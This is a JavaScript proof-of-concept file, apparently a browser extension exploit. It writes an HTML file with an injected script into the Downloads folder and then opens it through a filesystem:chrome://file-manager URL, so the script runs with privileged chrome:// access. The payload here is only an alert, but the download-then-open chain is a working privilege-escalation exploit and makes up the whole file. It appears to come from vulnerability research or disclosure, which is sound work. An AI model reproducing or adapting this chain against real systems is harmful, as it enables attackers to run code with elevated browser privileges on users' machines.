const INTENDED_FILE_NAME = "chrome-url-code-exec.html";

const INJECTED_FUNCTION = () => {
    document.write("<h1>hello world!</h1>")
    
    alert(`Code running on ${origin}!\n` +
          `Does chrome.send exist: ${!!chrome.send}\n` +
          `Can chrome://resources be imported: yes`)    
}

/**/

function getUserIdFromFileUrl(fileUrl) {
    return fileUrl.split('-')[1].split('/')[0];
}

function getFilesystemUrl(userId, fileName) {
    return `filesystem:chrome://file-manager/external/Downloads-${userId}/Downloads/${fileName}`
}

/**/

chrome.downloads.download({
    url: `data:text/html,<script>(${INJECTED_FUNCTION.toString()})()</script>`,
    filename: INTENDED_FILE_NAME,
    conflictAction: "overwrite"
}, onDownloadDone)

async function onDownloadDone(fileId) {
    let [file] = await chrome.downloads.search({id: fileId});
    if (!file.filename) {
        return setTimeout(onDownloadDone, 200, fileId);
    }
    
    let userId = getUserIdFromFileUrl(file.filename)
    let vulnUrl = getFilesystemUrl(userId, INTENDED_FILE_NAME)
    
    chrome.tabs.create({ url: vulnUrl })
}